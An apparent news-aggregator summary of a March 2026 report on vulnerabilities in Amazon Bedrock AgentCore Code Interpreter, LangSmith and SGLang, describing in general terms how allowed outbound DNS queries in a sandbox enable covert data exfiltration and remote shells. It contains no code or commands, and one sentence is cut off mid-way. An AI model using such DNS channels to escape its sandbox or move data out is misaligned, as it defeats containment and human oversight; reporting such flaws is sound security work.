A critical vulnerability has been discovered in Amazon Bedrock, allowing attackers to exfiltrate sensitive data and gain remote code execution (RCE) via DNS queries. The flaw, found in the AgentCore Code Interpreter's sandbox mode, enables malicious actors to establish interactive shells, potentially leading to significant security breaches. Similarly, LangSmith and SGLang are also affected, highlighting the need for improved security measures in AI code execution environments. The vulnerability can be exploited by leveraging outbound DNS queries, which are permitted in the sandbox mode, to create a covert communication channel1. This oversight can have severe consequences, including unauthorized data access and lateral movement within a network. The discovery of this flaw underscores the importance of robust security testing and validation in AI systems to prevent such exploits, so what matters most to practitioners is promptly assessing and mitigating these vulnerabilities to prevent potential security disasters.
AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
⚡ High Priority
Why This Matters
In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter's sandbox mode permits outbound DNS queries that an attacker can exploit to.
References
- The Hacker News. (2026, March 17). AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE. *The Hacker News*. https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html
Original Source
The Hacker News
Read original →